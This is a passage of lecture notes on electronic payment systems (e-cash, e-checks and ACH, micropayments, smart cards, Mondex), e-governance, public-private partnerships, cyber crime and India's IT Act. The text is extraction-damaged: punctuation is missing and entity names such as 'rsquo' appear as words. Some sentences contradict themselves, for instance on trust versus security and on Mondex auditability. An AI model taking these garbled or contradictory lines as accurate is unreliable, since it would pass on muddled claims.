and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
